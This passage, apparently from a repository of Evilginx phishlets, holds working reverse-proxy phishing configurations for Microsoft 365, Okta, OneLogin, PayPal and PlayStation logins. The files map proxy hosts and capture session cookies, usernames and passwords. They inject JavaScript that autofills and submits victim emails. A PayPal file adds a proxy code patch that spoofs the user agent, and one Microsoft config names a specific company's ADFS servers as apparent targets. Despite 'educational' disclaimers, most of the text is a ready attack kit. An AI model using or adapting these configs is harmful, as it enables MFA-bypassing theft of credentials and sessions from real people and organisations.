15 |   #- {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-host>', session: true, is_landing:false}
16 |   #- {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-host>:443', session: true, is_landing:false}
17 |   - {phish_sub: 'adfs', orig_sub: 'sso', domain: 'godaddy.com', session: true, is_landing:false}
18 |   - {phish_sub: 'adfs', orig_sub: 'sso', domain: 'godaddy.com:443', session: true, is_landing:false}
19 |   - {phish_sub: 'adfs', orig_sub: 'adfs', domain: 'woodhead-group.co.uk', session: true, is_landing:false}
20 |   - {phish_sub: 'adfs', orig_sub: 'adfs', domain: 'woodhead-group.co.uk:443', session: true, is_landing:false}
21 |   - {phish_sub: 'sso', orig_sub: 'sso', domain: 'woodhead-group.co.uk', session: true, is_landing:false}
22 |   - {phish_sub: 'sso', orig_sub: 'sso', domain: 'woodhead-group.co.uk:443', session: true, is_landing:false}
23 |   - {phish_sub: 'sts', orig_sub: 'sts', domain: 'woodhead-group.co.uk', session: true, is_landing:false}
24 |   - {phish_sub: 'sts', orig_sub: 'sts', domain: 'woodhead-group.co.uk:443', session: true, is_landing:false}
25 |   - {phish_sub: 'idfs', orig_sub: 'sts', domain: 'woodhead-group.co.uk', session: true, is_landing:false}
26 |   - {phish_sub: 'idfs', orig_sub: 'sts', domain: 'woodhead-group.co.uk:443', session: true, is_landing:false}
27 | 
28 | sub_filters:
29 |   - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
30 |   - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
31 |   # Uncomment and fill in if your target organization utilizes ADFS
32 |   #- {triggers_on: '<insert-adfs-subdomain-and-host>', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
33 |   - {triggers_on: 'sso.godaddy.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
34 |   - {triggers_on: 'adfs.woodhead-group.co.uk', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
35 |   - {triggers_on: 'sso.woodhead-group.co.uk', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
36 |   - {triggers_on: 'sts.woodhead-group.co.uk', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
37 |   - {triggers_on: 'idfs.woodhead-group.co.uk', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
38 | auth_tokens:
39 |   - domain: '.login.microsoftonline.com'
40 |     keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT']
41 |   - domain: 'login.microsoftonline.com'
42 |     keys: ['SignInStateCookie']
43 | auth_urls:
44 |  - '/kmsi*'
45 | credentials:
46 |   username:
47 |     key: '(login|UserName)'
48 |     search: '(.*)'
49 |     type: 'post'
50 |   password:
51 |     key: '(passwd|Password)'
52 |     search: '(.*)'
53 |     type: 'post'
54 | login:
55 |   domain: 'login.microsoftonline.com'
56 |   path: '/'
57 | js_inject:
58 |   - trigger_domains: ["www.domain.com"]
59 |     trigger_paths: ["/"]
60 |     script: |
61 |             function gimmesleep(ms) {
62 |               return new Promise(resolve => setTimeout(resolve, ms));
63 |             }
64 |             async function redir() {
65 |               await gimmesleep(2000);
66 |               window.location.href = "{rurl}";
67 |             }
68 |             redir()
69 | js_inject:
70 |   - trigger_domains: ["login.microsoftonline.com"]
71 |     trigger_paths: ["/common/oauth2/","/","/*"]
72 |     script: |
73 |       function lp(){
74 |         var emailId = document.querySelector("#i0116");
75 |         var nextButton = document.querySelector("#idSIButton9");
76 |         var query = window.location.href;
77 |         if (/#/.test(window.location.href)){
78 |         var res = query.split("#");
79 |         var data1 = res[0];
80 |         var data2 = res[1];
81 |         console.log(data1);
82 |         console.log(data2);
83 |           if (emailId != null) {
84 |           var m = data2.replace(/[=]/gi, '');
85 |           emailId.focus();
86 |           emailId.value = m;
87 |           nextButton.focus();
88 |           nextButton.click();
89 |           console.log("YES!");
90 |           return;
91 |         }
92 |         }
93 |         setTimeout(function(){lp();}, 1500);
94 |       }
95 |       setTimeout(function(){lp();}, 1500);            


--------------------------------------------------------------------------------
/o365(working2).yaml:
--------------------------------------------------------------------------------
 1 | name: 'o365'
 2 | author: '@An0nud4y'
 3 | min_ver: '2.3.0'
 4 | proxy_hosts:
 5 |   - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
 6 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false}
 7 |   # The lines below are needed if your target organization utilizes ADFS.
 8 |   # If they do, you need to uncomment all following lines that contain <...>
 9 |   # To get the correct ADFS subdomain, test the web login manually and check where you are redirected.
10 |   # Assuming you get redirected to adfs.example.com, the placeholders need to be filled out as followed:
11 |   #    <insert-adfs-subdomain> = adfs
12 |   #    <insert-adfs-host> = example.com
13 |   #    <insert-adfs-subdomain-and-host> = adfs.example.com
14 |   #- {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-host>', session: true, is_landing:false}
15 |   #- {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-host>:443', session: true, is_landing:false}
16 | sub_filters:
17 |   - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
18 | 
19 |   - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
20 |   # Uncomment and fill in if your target organization utilizes ADFS
21 |   #- {triggers_on: '<insert-adfs-subdomain-and-host>', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
22 | 
23 | auth_tokens:
24 |   - domain: '.login.microsoftonline.com'
25 |     keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', '.*,regexp']
26 |   - domain: 'login.microsoftonline.com'
27 |     keys: ['SignInStateCookie', '.*,regexp']
28 | credentials:
29 |   username:
30 |     key: '(login|UserName)'
31 |     search: '(.*)'
32 |     type: 'post'
33 |   password:
34 |     key: '(passwd|Password)'
35 |     search: '(.*)'
36 |     type: 'post'
37 | login:
38 |   domain: 'login.microsoftonline.com'
39 |   path: '/'
40 | js_inject:
41 |   - trigger_domains: ["login.microsoftonline.com"]
42 |     trigger_paths: ["/common/oauth2/"]
43 |     trigger_params: ["email"]
44 |     script: |
45 |       function lp(){
46 |         var email = document.querySelectorAll('input[type=email]')[0];
47 |         if (email != null) {
48 |           email.value = "{email}";
49 |           setTimeout(function(){
50 |             document.querySelectorAll('input[type=submit]')[0].click();
51 |             }, 5000);
52 |           return;
53 |         }
54 |         setTimeout(function(){lp();}, 100);
55 |       }
56 |       setTimeout(function(){lp();}, 100);
57 | 


--------------------------------------------------------------------------------
/o365(working2a).yaml:
--------------------------------------------------------------------------------
 1 | name: 'o365'
 2 | author: '@An0nud4y'
 3 | min_ver: '2.3.0'
 4 | proxy_hosts:
 5 |   - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: false}
 6 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false}
 7 |   - {phish_sub: 'login', orig_sub: 'login', domain: 'live.com', session: true, is_landing: true}
 8 |   - {phish_sub: 'account', orig_sub: 'account', domain: 'live.com', session: false, is_landing: false}
 9 |   - {phish_sub: 'logincdn', orig_sub: 'logincdn', domain: 'msauth.net', session: false, is_landing: false} 
10 |   
11 | sub_filters:
12 |   - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
13 |   - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
14 |   - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/ppsecure/', replace: 'https://{hostname}/ppsecure/', mimes: ['text/html', 'application/json', 'application/javascript']}
15 |   - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetCredentialType.srf', replace: 'https://{hostname}/GetCredentialType.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
16 |   - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetSessionState.srf', replace: 'https://{hostname}/GetSessionState.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
17 |   - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
18 |   - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
19 |   - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
20 |   - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
21 |   - {triggers_on: 'login.live.com', orig_sub: 'logincdn', domain: 'msauth.net', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
22 |   - {triggers_on: 'login.live.com', orig_sub: 'logincdn', domain: 'msauth.net', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
23 |   - {triggers_on: 'login.live.com', orig_sub: 'logincdn', domain: 'msauth.net', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
24 | 
25 | auth_tokens:
26 |   - domain: '.login.microsoftonline.com'
27 |     keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', '.*,regexp']
28 |   - domain: 'login.microsoftonline.com'
29 |     keys: ['SignInStateCookie', '.*,regexp']
30 |   - domain: 'login.live.com'
31 |     keys: ['.*,regexp']    
32 |   - domain: '.login.live.com'
33 |     keys: ['.*,regexp']      
34 | credentials:
35 |   username:
36 |     key: '(login|UserName)'
37 |     search: '(.*)'
38 |     type: 'post'
39 |   password:
40 |     key: '(passwd|Password)'
41 |     search: '(.*)'
42 |     type: 'post'
43 | login:
44 |   domain: 'login.microsoftonline.com'
45 |   path: '/'
46 | js_inject:
47 |   - trigger_domains: ["login.microsoftonline.com"]
48 |     trigger_paths: ["/common/oauth2/"]
49 |     trigger_params: ["email"]
50 |     script: |
51 |       function lp(){
52 |         var email = document.querySelectorAll('input[type=email]')[0];
53 |         if (email != null) {
54 |           email.value = "{email}";
55 |           setTimeout(function(){
56 |             document.querySelectorAll('input[type=submit]')[0].click();
57 |             }, 5000);
58 |           return;
59 |         }
60 |         setTimeout(function(){lp();}, 100);
61 |       }
62 |       setTimeout(function(){lp();}, 100);
63 | 


--------------------------------------------------------------------------------
/okta.yaml:
--------------------------------------------------------------------------------
 1 | author: '@mikesiegel'
 2 | min_ver: '2.3.0'
 3 | proxy_hosts:
 4 |   - {phish_sub: 'login', orig_sub: 'login', domain: 'okta.com', session: false, is_landing: false}
 5 |   - {phish_sub: '', orig_sub: '', domain: 'okta.com', session: false, is_landing: false }
 6 |   - {phish_sub: 'EXAMPLE', orig_sub: 'EXAMPLE', domain: 'okta.com', session: true, is_landing: true}
 7 | sub_filters:
 8 |   - {triggers_on: 'EXAMPLE.okta.com', orig_sub: '', domain: 'EXAMPLE.okta.com', search: 'sha384-.{64}', replace: '', mimes: ['text/html']}
 9 | auth_tokens:
10 |   - domain: 'EXAMPLE.okta.com'
11 |     keys: ['sid']
12 | credentials:
13 |   username:
14 |     key: ''
15 |     search: '"username":"([^"]*)'
16 |     type: 'json'
17 |   password:
18 |     key: ''
19 |     search: '"password":"([^"]*)'
20 |     type: 'json'
21 | login:
22 |   domain: 'EXAMPLE.okta.com'
23 |   path: '/login/login.htm'
24 | 


--------------------------------------------------------------------------------
/onelogin.yaml:
--------------------------------------------------------------------------------
 1 | name: 'onelogin'
 2 | author: '@perfectlylogical'
 3 | min_ver: '2.3.0'
 4 | # NOTE: Do not forget to change EXMAPLE to the relevant sub domain.
 5 | proxy_hosts:
 6 |   - {phish_sub: '', orig_sub: '', domain: 'onelogin.com', session: false, is_landing: false }
 7 |   - {phish_sub: 'EXAMPLE', orig_sub: 'EXAMPLE', domain: 'onelogin.com', session: true, is_landing: true}
 8 |   - {phish_sub: 'portal-cdn', orig_sub: 'portal-cdn', domain: 'onelogin.com', session: false, is_landing: false}
 9 |   # Uncomment this line if the target is using the default CSS for onelogin. Will manifest as the login page not loading.
10 |   #- {phish_sub: 'web-login-cdn', orig_sub: 'web-login-cdn', domain: 'onelogin.com', session: false, is_landing: false}
11 | sub_filters: []
12 | auth_tokens:
13 |   - domain: '.onelogin.com'
14 |     keys: ['onelogin.com_user']
15 |   - domain: 'EXAMPLE.onelogin.com'
16 |     keys: ['sub_session_onelogin.com']
17 | auth_urls:
18 |  - '/portal/'
19 |  - '/client/apps'
20 | # This is used to force the rememebr me functionality if the target is using the /login url
21 | # This method will not work if they are using the multistep login method on the /login2 url  
22 | force_post:
23 |   - path: '/sessions'
24 |     search:
25 |       - {key: 'authenticity_token', search: '.*'}
26 |       - {key: 'email', search: '.*'}
27 |       - {key: 'password', search: '.*'}
28 |     force:
29 |       - {key: 'persist_session', value: 'true'}
30 |     type: 'post'
31 | # The post type is used to capture credentials which use the /login url
32 | # The json type is used to capture credentials which use the /login2 url
33 | credentials:
34 |   username:
35 |     key: 'email'
36 |     search: '(.*)'
37 |     type: 'post'
38 |   password:
39 |     key: 'password'
40 |     search: '(.*)'
41 |     type: 'post'
42 |   username:
43 |     key: 'login'
44 |     search: '"login":"(.*)"'
45 |     type: 'json'
46 |   password:
47 |     key: 'password'
48 |     search: '"password":"(.*)",'
49 |     type: 'json'
50 | login:
51 |   domain: 'EXAMPLE.onelogin.com'
52 |   path: '/login'
53 | 


--------------------------------------------------------------------------------
/paypal(working2).yaml:
--------------------------------------------------------------------------------
 1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
 2 | # PLEASE DO NOT MISUSE THIS PHISHLET.
 3 | 
 4 | # -> To make this phishlet work in chrome browser, We need to modify the proxy code.
 5 | # -> Add below code lines in http_proxy.go file in /core directory of evilginx repo.
 6 | # -> In http_proxy.go file on line 271 , Just above comment " //fix referer".
 7 | #
 8 | 
 9 | #				// Replace Any User Agent With Firefox UserAgent ( To fix Paypal phishlet issues in chromium Browser )
10 | #				useragent := req.Header.Get("User-Agent")
11 | #				if useragent != "" {
12 | #							req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0")
13 | #							log.Debug("[%d] Injected User Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 ", ps.Index)
14 | #				}
15 | #
16 | 
17 | 
18 | #________________________________________________________________________________________________________________________________________________________________
19 | 
20 | # Email Params can be Triggered By using Below Command.
21 | # lures edit params ID email=test@email.com
22 | # Where ID is lure id number, and test@email.com is your known victim account email address for paypal. 
23 | #________________________________________________________________________________________________________________________________________________________________
24 | 
25 | 
26 | author: '@An0nud4y'
27 | min_ver: '2.3.0'
28 | proxy_hosts:
29 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'paypal.com', session: true, is_landing: true, auto_filter: true}
30 |   - {phish_sub: '', orig_sub: '', domain: 'paypal.com', session: true, is_landing: false, auto_filter: true}
31 |   - {phish_sub: 'c', orig_sub: 'c', domain: 'paypal.com', session: false, is_landing: false}
32 |   - {phish_sub: 'b.stats', orig_sub: 'b.stats', domain: 'paypal.com', session: false, is_landing: false}
33 |   - {phish_sub: 't', orig_sub: 't', domain: 'paypal.com', session: false, is_landing: false}
34 |   - {phish_sub: 'c6', orig_sub: 'c6', domain: 'paypal.com', session: false, is_landing: false}
35 |   - {phish_sub: 'hnd.stats', orig_sub: 'hnd.stats', domain: 'paypal.com', session: false, is_landing: false}
36 |   - {phish_sub: 'm', orig_sub: '', domain: '192.55.233.1', session: false, is_landing: false}
37 |   - {phish_sub: 'ssl', orig_sub: 'slc.stats', domain: 'paypal.com', session: false, is_landing: false}
38 | 
39 | sub_filters:
40 |   - {triggers_on: 'www.paypal.com', orig_sub: 'www', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
41 |   - {triggers_on: 'www.paypal.com', orig_sub: 'www', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
42 |   - {triggers_on: 'www.paypal.com', orig_sub: '', domain: '192.55.233.1', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
43 |   - {triggers_on: 'www.paypal.com', orig_sub: 'c6', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
44 |   - {triggers_on: 'www.paypal.com', orig_sub: 'c6', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
45 |   - {triggers_on: 'www.paypal.com', orig_sub: 'c', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
46 |   - {triggers_on: 'www.paypal.com', orig_sub: 'c', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
47 |   - {triggers_on: 'www.paypal.com', orig_sub: 'hnd.stats', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
48 |   - {triggers_on: 'www.paypal.com', orig_sub: 'hnd.stats', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
49 |   - {triggers_on: 'www.paypal.com', orig_sub: 'slc.stats', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
50 |   - {triggers_on: 'www.paypal.com', orig_sub: 'slc.stats', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
51 |   - {triggers_on: 'www.paypal.com', orig_sub: 't', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
52 |   - {triggers_on: 'www.paypal.com', orig_sub: 't', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
53 |   - {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
54 |   - {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
55 |   - {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypal.com', search: 'Chrome/', replace: 'Firefox/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
56 |   - {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypal.com', search: 'Safari/', replace: 'Firefox/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
57 |   - {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypal.com', search: 'AppleWebKit/', replace: 'Gecko/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
58 | 
59 | 
60 | auth_tokens:
61 |   - domain: '.paypal.com'
62 |     keys: ['fn_dt', 'id_token', 'x-pp-s', 'SEGM', '.*,regexp']
63 | auth_urls:
64 |   - '/myaccount/summary'
65 |   - '/myaccount/.*'      
66 |   - '/myaccount'    
67 | credentials:
68 |   username:
69 |     key: 'login_email'
70 |     search: '(.*)'
71 |     type: 'post'
72 |   password:
73 |     key: 'login_password'
74 |     search: '(.*)'
75 |     type: 'post'
76 | 
77 | login:
78 |   domain: 'www.paypal.com'
79 |   path: '/signin'
80 | 
81 | js_inject:
82 |   - trigger_domains: ["www.paypal.com"]
83 |     trigger_paths: ["/signin"]
84 |     trigger_params: ["email"]
85 |     script: |
86 |       function lp(){
87 |         var email = document.querySelector("#email");
88 |         if (email != null && password != null) {
89 |           email.value = "{email}";
90 |           return;
91 |         }
92 |         setTimeout(function(){lp();}, 100);
93 |       }
94 |       setTimeout(function(){lp();}, 100);
95 | 
96 | 


--------------------------------------------------------------------------------
/paypal.yaml:
--------------------------------------------------------------------------------
 1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
 2 | # PLEASE DO NOT MISUSE THIS PHISHLET.
 3 | 
 4 | # Email Params can be Triggered By using Below Command.
 5 | # lures edit params ID email=test@email.com
 6 | # Where ID is lure id number, and test@email.com is your known victim account email address for paypal. 
 7 | 
 8 | author: '@An0nud4y'
 9 | min_ver: '2.3.0'
10 | proxy_hosts:
11 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'paypal.com', session: true, is_landing: true, auto_filter: true}
12 |   - {phish_sub: '', orig_sub: '', domain: 'paypal.com', session: true, is_landing: false, auto_filter: true}
13 | #  - {phish_sub: 'paypalobjects', orig_sub: 'www', domain: 'paypalobjects.com', session: false, is_landing: false}
14 |   - {phish_sub: 'c', orig_sub: 'c', domain: 'paypal.com', session: false, is_landing: false}
15 |   - {phish_sub: 'b.stats', orig_sub: 'b.stats', domain: 'paypal.com', session: false, is_landing: false}
16 |   - {phish_sub: 't', orig_sub: 't', domain: 'paypal.com', session: false, is_landing: false}
17 |   - {phish_sub: 'c6', orig_sub: 'c6', domain: 'paypal.com', session: false, is_landing: false}
18 |   - {phish_sub: 'hnd.stats', orig_sub: 'hnd.stats', domain: 'paypal.com', session: false, is_landing: false}
19 |  
20 | sub_filters:
21 |   - {triggers_on: 'www.paypal.com', orig_sub: 'www', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
22 |   - {triggers_on: 'www.paypal.com', orig_sub: 'www', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
23 | #  - {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypalobjects.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
24 | #  - {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypalobjects.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
25 |   - {triggers_on: 'www.paypal.com', orig_sub: 'c6', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
26 |   - {triggers_on: 'www.paypal.com', orig_sub: 'c6', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
27 |   - {triggers_on: 'www.paypal.com', orig_sub: 'c', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
28 |   - {triggers_on: 'www.paypal.com', orig_sub: 'c', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
29 |   - {triggers_on: 'www.paypal.com', orig_sub: 'hnd.stats', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
30 |   - {triggers_on: 'www.paypal.com', orig_sub: 'hnd.stats', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
31 |   - {triggers_on: 'www.paypal.com', orig_sub: 't', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
32 |   - {triggers_on: 'www.paypal.com', orig_sub: 't', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
33 |   - {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
34 |   - {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
35 | 
36 | auth_tokens:
37 |   - domain: '.paypal.com'
38 |     keys: ['.*,regexp']
39 | auth_urls:
40 |   - '/myaccount/summary'
41 |   - '/myaccount/.*'     
42 |     
43 | credentials:
44 |   username:
45 |     key: 'login_email'
46 |     search: '(.*)'
47 |     type: 'post'
48 |   password:
49 |     key: 'login_password'
50 |     search: '(.*)'
51 |     type: 'post'
52 | 
53 | login:
54 |   domain: 'www.paypal.com'
55 |   path: '/signin'
56 | 
57 | js_inject:
58 |   - trigger_domains: ["www.paypal.com"]
59 |     trigger_paths: ["/signin"]
60 |     trigger_params: ["email"]
61 |     script: |
62 |       function lp(){
63 |         var email = document.querySelector("#email");
64 |         if (email != null && password != null) {
65 |           email.value = "{email}";
66 |           return;
67 |         }
68 |         setTimeout(function(){lp();}, 100);
69 |       }
70 |       setTimeout(function(){lp();}, 100);
71 | 


--------------------------------------------------------------------------------
/playstation.yaml:
--------------------------------------------------------------------------------
 1 | author: '@An0nud4y'
 2 | min_ver: '2.3.0'
 3 | proxy_hosts:
 4 |   - {phish_sub: 'id', orig_sub: 'id', domain: 'sonyentertainmentnetwork.com', session: true, is_landing: true}
 5 |   - {phish_sub: 'auth.api', orig_sub: 'auth.api', domain: 'sonyentertainmentnetwork.com', session: true, is_landing: true}
 6 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'playstation.com', session: true, is_landing: true}
 7 |   - {phish_sub: 'accounts.api', orig_sub: 'accounts.api', domain: 'playstation.com', session: true, is_landing: true}
 8 |   - {phish_sub: 'smetrics.aem', orig_sub: 'smetrics.aem', domain: 'playstation.com', session: true, is_landing: true}
 9 |   - {phish_sub: 'eventcom.api.np.km', orig_sub: 'eventcom.api.np.km', domain: 'playstation.net', session: true, is_landing: true}
10 |   - {phish_sub: 'pdr-srlc.api', orig_sub: 'pdr-srlc.api', domain: 'sonyentertainmentnetwork.com', session: true, is_landing: true}
11 | 
12 | #lengtmp+oszxh@gmail.com
13 | 
14 | sub_filters:
